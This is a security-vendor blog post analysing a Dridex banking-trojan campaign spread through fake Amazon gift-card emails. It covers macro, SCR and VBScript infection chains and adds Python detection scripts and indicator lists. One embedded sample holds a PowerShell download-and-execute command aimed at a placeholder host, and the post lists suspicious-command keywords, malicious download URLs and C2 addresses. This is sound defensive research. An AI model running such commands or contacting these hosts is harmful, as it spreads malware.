Amazon Gift Card Offer Serves Up Dridex Banking Trojan

Over the course of December 2020, the Cybereason Nocturnus Team has been tracking cybercrime campaigns related to the holiday season, and more specifically to online shopping. For obvious reasons, 2020 is a year in which consumers shifted their shopping habits toward doing most of their shopping online.

Consumers have long been a favored target for cybercriminals, and the sharply increased volume of online shopping spurred by the COVID-19 pandemic has made consumer-focused attacks potentially even more attractive. According to data from the IBM U.S. Retail Index released in August 2020, “the pandemic has accelerated the shift away from physical stores to digital shopping by roughly five years,” and “e-commerce is projected to grow by nearly 20% in 2020.”

Cybercriminals are tracking these trends and leveraging them for financial gain. One recent campaign that caught our eye uses a fake Amazon gift card lure to deliver the Dridex banking trojan.

Key Findings

Threat actors leverage the holiday season: The campaign targets users of Amazon, one of the most popular shopping platforms, as online shopping volume continues to trend upward.

Most targets are in the US and Western Europe: The vast majority of the victims appear to be located in the US and Western Europe, where Amazon is very popular and operates local websites.

Social engineering: The campaign uses legitimate-looking emails, icons and naming conventions to lure victims into downloading the malicious attachments.

Three infection methods: A victim can be infected by any of three methods: an SCR file, a malicious document, or a VBScript file.

Multi-staged: Each infection mechanism contains more than one stage, either unarchiving a password-protected archive that holds further file types, or running PowerShell commands to connect to the C2.

Final payload with severe consequences: The final payload is the notorious Dridex banking trojan, which exposes the victim to theft of banking data.

Background

Dridex is one of the most notorious and prolific banking trojans. It has been active in different variants since at least 2012, its predecessor being Feodo (AKA Cridex, Bugat). It is considered an evasive malware that steals e-banking credentials and other sensitive information, and it relies on a resilient command and control (C2) infrastructure in which servers act as backups for one another: if one is down, the bot connects to the next in line, allowing Dridex to keep exfiltrating stolen data.

Dridex is most commonly delivered via phishing emails containing Microsoft Office documents weaponized with malicious macros, and it is constantly updated with new features such as anti-analysis. Dridex is largely operated by Evil Corp, one of the most prosperous cybercrime groups, which has been operating for over a decade. One of its best-known affiliates is TA505, a financially motivated cybercrime group that has been distributing Dridex since 2014. TA505 is also known to use other malware such as SDBOT, ServHelper and FlawedAmmyy, as well as the CLOP ransomware.

The current campaign targets consumers who are falsely informed that they have received an Amazon gift card, and infects the target with three similar yet distinct techniques: similar in that each lures the victim into clicking a file, different in their execution flow:

• Word document that contains a malicious macro

• Self-extracting SCR file, a known technique used by Dridex

• VBScript file delivered by the email, another known technique used by Dridex


[Figure: Amazon phishing email. Credit: @JAMESWT_MHT]

After the user downloads the offered file, they are redirected to Amazon's legitimate web page, which lends the lure more credibility with the victim.

Infection Vector and Campaign Analysis

The initial access vector of this campaign is an email purporting to be from Amazon and offering a free gift card. The email prompts the user to download the gift card, which in fact leads to infection by one of three delivery methods.

First Delivery Method: Documents with Malicious Macros

The first delivery method is a malicious Word document with some variation of “Gift Card” in the file name:

[Figure: A list of documents containing the malicious macro]

The malicious Word document prompts the victim to click the “Enable Content” button that runs the macro, a common technique used in this sort of attack, because embedded macros are usually disabled by default:

[Figure: Content of the Word documents]

Once the user enables the content, the following obfuscated VBScript file is executed:

[Figure: Dridex malicious VBScript file as seen in VirusTotal, with a low detection rate]

The macro itself contains an obfuscated base64 encoded PowerShell script:

[Figure: Beginning of the obfuscated and encoded PowerShell script]

The PowerShell script is prefixed by a command that opens a pop-up with a fake error message, tricking the user into thinking there was an error opening the file while the macro is in fact running in the background:

[Figure: Fake error pop-up]

The Cybereason Defense Platform detects the malicious activity, logs the different attack components together with their command lines, and then automatically decodes the base64 encoded data:

[Figure: Malicious document execution in the Cybereason Defense Platform]

Finally, the PowerShell connects to the C2 and drops Dridex.
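The decoding step described above is easy to reproduce in a triage script. The following is an added example (not Cybereason's code and not the campaign's actual script): it extracts the base64 blob that follows any accepted spelling of PowerShell's -EncodedCommand flag, decodes it as UTF-16LE, and flags keywords that match the behaviour the post describes (a fake error pop-up followed by download-and-execute). The sample command line, the placeholder script and its URL are constructed for illustration.

```python
"""Decode and triage PowerShell -EncodedCommand launches such as the one the
macro spawns. Added example, not Cybereason's code; the command line and the
script below are constructed placeholders, not the campaign's real payload."""
import base64
import re

# powershell.exe accepts -e, -ec and any unambiguous prefix of -EncodedCommand,
# so a detection that only looks for the full flag name is trivially bypassed.
_FLAG_RE = re.compile(r"(?<![\w-])-(\w+)\s+['\"]?([A-Za-z0-9+/=]{16,})", re.ASCII)

# Keywords worth a second look in the outer command line or the decoded script.
SUSPICIOUS = (
    "downloadstring", "downloadfile", "net.webclient", "invoke-webrequest",
    "invoke-expression", "iex ", "frombase64string", "regsvr32",
    "-w hidden", "-windowstyle hidden", "bypass", "messagebox", "msgbox",
)


def is_encoded_flag(flag):
    """True for -e, -ec and every prefix of -EncodedCommand of length >= 2."""
    f = flag.lower()
    return f in ("e", "ec") or (len(f) >= 2 and "encodedcommand".startswith(f))


def encode_for_powershell(script):
    """Produce the base64(UTF-16LE) form PowerShell expects; used to build samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_commands(cmdline):
    """Return the decoded scripts of all -EncodedCommand arguments in cmdline."""
    scripts = []
    for flag, blob in _FLAG_RE.findall(cmdline):
        if not is_encoded_flag(flag):
            continue
        try:
            scripts.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):  # not base64, or not UTF-16LE text
            continue
    return scripts


def triage(cmdline):
    """Decode the command line and report which suspicious keywords appear."""
    decoded = decode_encoded_commands(cmdline)
    haystack = "\n".join([cmdline] + decoded).lower()
    hits = sorted(k.strip() for k in SUSPICIOUS if k in haystack)
    return {"decoded": decoded, "indicators": hits, "suspicious": bool(hits)}


# Constructed sample mirroring the post's description: a fake error pop-up
# followed by a download-and-execute. The URL is a placeholder.
SAMPLE_SCRIPT = (
    "Add-Type -AssemblyName System.Windows.Forms;"
    "[System.Windows.Forms.MessageBox]::Show('There was an error opening the file');"
    "$u='http://example.invalid/giftcard';"
    "IEX (New-Object Net.WebClient).DownloadString($u)"
)
SAMPLE_CMDLINE = ("powershell.exe -NoP -w hidden -ExecutionPolicy bypass -enc "
                  + encode_for_powershell(SAMPLE_SCRIPT))

if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    print(result["decoded"][0])
    print("indicators:", ", ".join(result["indicators"]))
```

The flag matching is deliberately loose: any prefix of -EncodedCommand from -en upward, plus the -e and -ec aliases, is accepted by powershell.exe, so a rule keyed on the literal string "-EncodedCommand" misses most real launches. The outer command line is scanned as well as the decoded script, because "-w hidden" and "bypass" live outside the encoded blob.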

Second Delivery Method: Screensaver Files

The second delivery method used by the attackers involves SCR (screensaver) files. An SCR file is an ordinary Windows executable under a different extension, which makes it attractive to attackers for two reasons: it can slip past email filters that block only the well-known executable extensions, and a self-extracting archive saved with the .scr extension lets them bundle several components into a single file that runs as soon as the victim double-clicks it.

The SCR files have very convincing Amazon themed icons and naming conventions. At least four distinctive files were uploaded to VirusTotal:

[Figure: List of the SCR files as seen in VirusTotal]

One of the SCR files contains a VBScript, an archive (“reedmi.cvl”), a utility to extract it, and a batch file:

[Figure: Contents of the SCR file]

The first file executed is “svideo.vbs” which creates a WScript object and runs “elp.bat”:

[Figure: Contents of svideo.vbs]

“elp.bat” is a batch file that renames and unarchives the password-protected “reedmi.cvl” with the bundled “extraPFZ” executable, runs “chinatown.vbs”, which is extracted from “reedmi.cvl”, and then deletes itself together with the renamed “reedmi.cvl” and what appears to be a leftover reference to an earlier dropper file name that the threat actor did not update:

[Figure: Contents of elp.bat]

In addition to “chinatown.vbs”, “reedmi.cvl” also contains another batch file and the Dridex DLL:

[Figure: Content of reedmi.cvl]

Once again, the VBS file’s role is solely to run a batch file, this time “7p.bat”:

[Figure: Content of chinatown.vbs]

Finally, “7p.bat” creates a hidden folder with the system attribute set, uses “regsvr32” to run the Dridex DLL, terminates the extraPFZ executable from the previous stage, changes the permissions of the Dridex DLL again, and deletes all remaining files to remove its traces:

[Figure: Contents of 7p.bat extracted from reedmi.cvl]

The Dridex DLL can be seen in Virustotal:

[Figure: Dridex DLL detection in VirusTotal]

The whole infection chain described above can be seen in the Cybereason Defense Platform. Each component of the attack is documented, and both the SCR file and the regsvr32 process that executes Dridex are detected as malicious:

[Figure: Process tree of the malicious SCR file in the Cybereason Defense Platform]

When the Cybereason sensor “Prevention Mode” is enabled, the execution of the Dridex DLL is prevented:

[Figure: Execution prevention of the Dridex DLL by the Cybereason sensor]

Third Delivery Method: VBScript Files

The third infection method is a straightforward VBScript file that is also downloaded via a malicious link in the email body:

[Figure: Gift card VBScript as seen in VirusTotal]

This VBScript file is about 2MB in size because of an archive bundled within it.

This archive, named “Norris.zip”, is dropped on the infected machine and contains the Dridex DLL named “Gino.tga”:

[Figure: Contents of the “Norris.zip” archive]

Finally, as seen in the SCR version, the Dridex DLL is executed using the regsvr32 process.
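Both the SCR chain and the VBS variant end the same way: a script host spawns cmd.exe and regsvr32.exe loads a DLL that carries a non-.dll extension from a user-writable folder. That pattern is what a hunt query should key on, rather than the file names, which change per build. The following is an added example (not Cybereason's code) that runs such a hunt over simplified Sysmon-style process-creation records. The records are constructed here to mirror the chain the post describes; the names AmazonGiftCard.scr and GiftCard.vbs, the Temp drop folder, the folder name "hidden", the DLL name "module.tga" in the SCR chain, the user "alice", and the use of attrib.exe to set the hidden and system attributes are all assumptions. svideo.vbs, elp.bat, extraPFZ, chinatown.vbs, 7p.bat, Norris.zip and Gino.tga are the names given in the post.

```python
"""Hunt for the regsvr32 loading chain described in the post in process-creation
telemetry. Added example, not Cybereason's code: the events are constructed,
simplified Sysmon-style records; see the lead-in for which names are assumed."""
import ntpath
import re

# Script and shell hosts the post shows chaining into regsvr32.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}
# Locations a standard user can write to; registering a module from here is unusual.
USER_WRITABLE = re.compile(r"^[a-z]:\\(users\\[^\\]+\\|programdata\\|windows\\temp\\)", re.I)


def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def tokens(cmdline):
    """Split a Windows command line, keeping quoted paths intact."""
    return [q or p for q, p in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def ancestry(by_pid, pid):
    """Follow ppid links upward: [self, parent, grandparent, ...]."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def regsvr32_module(cmdline):
    """First non-switch argument of a regsvr32 command line (the module it loads)."""
    for tok in tokens(cmdline)[1:]:
        if not tok.startswith(("/", "-")):
            return tok
    return None


def hunt(events):
    """Flag regsvr32 loads and attrib +s +h calls that look like the Dridex chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        image = base(ev["image"])
        ancestors = [base(e["image"]) for e in ancestry(by_pid, ev["pid"])[1:]]
        via_script = any(a in SCRIPT_HOSTS for a in ancestors)
        if image == "regsvr32.exe":
            module = regsvr32_module(ev["cmdline"])
            if module is None:
                continue
            reasons = []
            if not module.lower().endswith(".dll"):
                reasons.append("module without .dll extension: " + ntpath.basename(module))
            if USER_WRITABLE.match(module):
                reasons.append("module in user-writable path")
            if via_script:
                reasons.append("launched via " + " <- ".join(ancestors))
            scr = [a for a in ancestors if a.endswith(".scr")]
            if scr:
                reasons.append("ancestor is a screensaver file: " + scr[0])
            if reasons:
                findings.append({"pid": ev["pid"], "rule": "regsvr32_loader",
                                 "module": module, "reasons": reasons})
        elif image == "attrib.exe" and via_script:
            switches = {t.lower() for t in tokens(ev["cmdline"])}
            if {"+s", "+h"} <= switches:
                findings.append({"pid": ev["pid"], "rule": "hidden_system_dir",
                                 "module": None, "reasons": ["attrib +s +h from a script host"]})
    return findings


TEMP = r"C:\Users\alice\AppData\Local\Temp"  # assumed drop location
SAMPLE_EVENTS = [  # constructed records, not real telemetry
    # Benign control: an installer registering a DLL under Program Files.
    {"pid": 50, "ppid": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i vendor.msi"},
    {"pid": 51, "ppid": 50, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    # SCR chain: svideo.vbs -> elp.bat -> extraPFZ -> chinatown.vbs -> 7p.bat -> regsvr32.
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Users\alice\Downloads\AmazonGiftCard.scr",
     "cmdline": "AmazonGiftCard.scr"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "wscript.exe " + ntpath.join(TEMP, "svideo.vbs")},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c elp.bat"},
    {"pid": 500, "ppid": 400, "image": ntpath.join(TEMP, "extraPFZ.exe"),
     "cmdline": "extraPFZ.exe"},  # extraction arguments are not reproduced in the post
    {"pid": 600, "ppid": 400, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "wscript.exe chinatown.vbs"},
    {"pid": 700, "ppid": 600, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c 7p.bat"},
    {"pid": 800, "ppid": 700, "image": r"C:\Windows\System32\attrib.exe",
     "cmdline": "attrib +s +h " + ntpath.join(TEMP, "hidden")},
    {"pid": 900, "ppid": 700, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32 /s " + ntpath.join(TEMP, "hidden", "module.tga")},
    # VBS chain: the gift card VBS drops Norris.zip and loads Gino.tga with regsvr32.
    {"pid": 1000, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "wscript.exe " + r"C:\Users\alice\Downloads\GiftCard.vbs"},
    {"pid": 1100, "ppid": 1000, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32 " + ntpath.join(TEMP, "Gino.tga")},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["pid"], f["rule"], f["module"], "|", "; ".join(f["reasons"]))
```

The benign msiexec-spawned regsvr32 produces no finding because every reason fails for it: a real .dll, a Program Files path, no script host in its ancestry. Each of the three reasons on its own generates noise in an enterprise fleet; in practice the combination of a non-.dll module under the user profile with a wscript/cmd ancestor is what separates this chain from legitimate COM registrations.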

Conclusion

Cybercriminals and nation-state threat actors alike find and exploit trending circumstances, such as the holiday season, the ongoing COVID-19 pandemic, or both combined, to infect unsuspecting victims.

This is also not the first time that an Amazon-themed campaign has been used to trick victims into downloading malware. Given the new reality of a COVID-19 world, and even more so at this time of year, campaigns that use well-known e-commerce vendors as part of the lure are very appealing to threat actors, on both mobile and desktop.

Add to the growing popularity of online shopping and its inherent risks the fact that Dridex is known to be takedown-resistant to some degree, and that many other destructive malware families are in circulation, and the risk of falling into this trap or another one based on social engineering is quite concerning.

When carrying out such attacks, threat actors spend a great deal of time customizing the themes used to get the attention of an unsuspecting victim. Post-infection, the deployment of the payload on the machine is often multi-staged and highly evasive. This Dridex campaign introduced three different attack vectors: if one fails, another may succeed, creating a backup mechanism not only for the C2 servers but also for completing the infection itself.

Similar themes leveraging gift card giveaways and other offers are not new in the cybercrime landscape, and will most likely continue to be used in the future. It is up to the user to be aware of such campaigns and to apply the relevant countermeasures.

MITRE ATT&CK BREAKDOWN

Initial Access: Phishing

Execution: Command and Scripting Interpreter: PowerShell; Command and Scripting Interpreter: Windows Command Shell; Command and Scripting Interpreter: Visual Basic

Persistence: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Privilege Escalation: Process Injection

Collection: Man in the Browser

Command and Control: Application Layer Protocol; Encrypted Channel; Proxy; Remote Access Software

 


 

Daniel Frank

Daniel Frank is a senior Malware Researcher at Cybereason. Prior to Cybereason, Frank was a Malware Researcher at F5 Networks and RSA Security. His core roles as a Malware Researcher include researching emerging threats, reverse-engineering malware and developing security-driven code. Frank has a BSc degree in information systems.

Dridex Banking Trojan | Indicators of Compromise

For each file type below, SHA-1 hashes are listed first, followed by the SHA-256 hashes.

Docs

24469cbb07d53b9de7993860a028610cd2c74f1a

861a3fa58726a801827b4a8f0eab4e468edf70d9

817f30717ce3811bde011d8cc55bbfe5354ac832

ee3634a25fd2f0947fbf86b143b90f906658e0c8

4582c6b6eee1151f0e17c54c565afb827d7db46f

2e3283ba63e87b2c4fc1e9acc7791c7f1c1230df

a2b1e3456211f24a727c341079bd2a6b79eacad9

113260e9e781cb36228f3ac403a11398a9c243eb

3d13044973e410e64b9686dfc0e139ffe6c90575

f41a4f7cc9d733fb3a52b3a7f5037eebca312414

567052f0b8b453932db3e18208990bca12bcc167

82cac4b400eda937002583584e92081a66002b88

701e5ee9a935686508511f834bc3a551eae9031e

1e4c849910d35e23fb8f3e67294f3e6ec0630360

8dbd9d1bfe48c59b5704d6275f478e768230c81d

8e0a6fe27090e76ecac36cc7be25de7a551c029a

4c64d69981328dbb70a2726c1709789ab84be40c

cc07421f4e00440ff06d36d8a56235e185158018

43e8989ee42051fb9006d54b639de69ca60e1e07

56811440234742e6b7617685e0dee6a1f4034dfe

da83c6acd96b44c79fa0a46a665db1f45ea5072e18a2534b90eb9e5218cb90d9

62837b5eadab683fcb65146360ff15a477402a9eb482bcb009949025ee378662

85e6b26fb743170eaaaf7d246447e6a1fc31cdd5c00d35bdcedc58344e79b4b9

374e49855da4707961a8d96360a89011d223d4ed7f02d3ca91c43dea305ebf9e

492be6f5d4ffdfad7369eabcf597d836a253c017ed86b88d3273476d745972b3

12154124ac818aba19bcb6359e0e56bf651a8c260c95dbefce8799733799cb45

a7310b2788b45ae9f503664ff2461ef36b8e529552aa4402338a47cc8a698c01

2643154741f0f24158b910372d741a3052c22ec731e7c6c2d56de49d01fb83c8

63be8f8941f30e508a10477f5df18aa84ee80654f2c80bac71438e6d89bcc1fb

19e223b2a021ef29d7672ec440adb4bff88914aa2208a036656befaadfecd391

255327cc966eebcdb52f94414c36920585f2190ae10a9560db5047def717b2ac

20025034054cf145b743dbd080be1ec4a8153f23f42a5f101df3cd51db618df9

fb22724422c3d14ce41129f3964c634c66daa8c5661c2f60def4178cee6738eb

a888a7f5140bad661317264229075089b1c8e1267984b3d495a39a5f5638a419

9ca6330ecc859154893e48bed53317005670c23c5d58bca8e991177cbb7324e9

d4704ca87e4e6072526a67adbf5e5a752172e947a4e6354d962455b4dce37994

cfa0c0bb7e94155fefa426031c9d52ccc43cf3dde56c97f68fb20262ebb7219d

a2e7925524c459515f03addcb576e2d92bcfb658891e470b56be71c22f561d5c

a39fd124cdc1ed93f57f95581a48881b878e42a249a6fbb1da203a03958a5846

e20dadb65651d81743aae5451f4f63d6fd7a7da48d4bf71af247a033ac46ee11

SCRs

a8adc02637c62262e02f0097222cda0cd2aef013

30d948edd1e0b1c7866148d9f6fd559f478958b7

653ab54e15b01473943cd897ded24f742b0193c5

80df010a6db104d6a75177564a543f253cc003c6

ee492eda053d19e082cd88acef8825e8dfd4616d51689e2e9667f5ed9035b1df

df2ed991a6ab65f2bc05805376dcf34de7febc5c5d4b37d400546e4e01d90fc0

2c6110a76dda8da49195052fa561ab8b8278c02df400124e46d26d2df228b70b

4f1c6ff815b087e2d5702485939f6e65deef7eaf72ee27641e6562162b47dae5

VBS from docs

bee5c9252b02824b9025c9b78ce7c5f050638ef5

981b418e83adfc89438ae388a7f15c62e527504827c2d6e68afe3e47f73f4191

Gift Card VBS

6a9315b617088b98c08c8d7aef8be34ffa565ecf

a7cd6b2211f59ee52f25aae90b726f6f07f79a6d5969344353f9c0910b6aaca3

“Norris.zip” archive dropped by the Gift Card VBS

6954c18d37f57bf644bebca0b186442c8af837e7

fe7c88c0e87a53c78750fe381b3993bb8c09b42e973bac9f7b338666a0543943

Dridex payloads

8b71bd0a2618d26a16a85245e7a92aef6d3da967

15bd1122fe1a910c3b8f255bbe74de5ffed57fd2

2daeeb9448614ad10b35b9d4c99ba607ef647f6e

b12b65a39a6261016b7473cfd08c316cee6958739e00bb746331bdfb52b4b0bb

a1658b979357f174c83dcd9867941d8cd917beb3ea67720fa43b6340b27762ba

560478c5532f341407bed4a90de3f7a53bb36d500691f1f41e7d18a44f354f8a

 

URLs

conjurosdeamoryhechiceriaacacio[.]com/tjbdhdvi1.zip

airbornegroup[.]net/y461xrm.zip

burstner.clabris[.]se/ucjk7st.zip

oya[.]qa/lfonl5.rar

cms.keita[.]ae/h0mqrz.rar

keitauniv.keita[.]ae/wchfvdsd7.rar

bespokeweddings[.]ie/k1c8dh4.rar

phones.pmrspain[.]com/xzeoxn8.rar

Dridex C2

194.225.58[.]216

198.57.200[.]100

178.254.40[.]132

216.172.165[.]70

About the Author

Cybereason Nocturnus

The Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence, and enterprise security to uncover emerging threats across the globe. They specialize in analyzing new attack methodologies, reverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first to release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.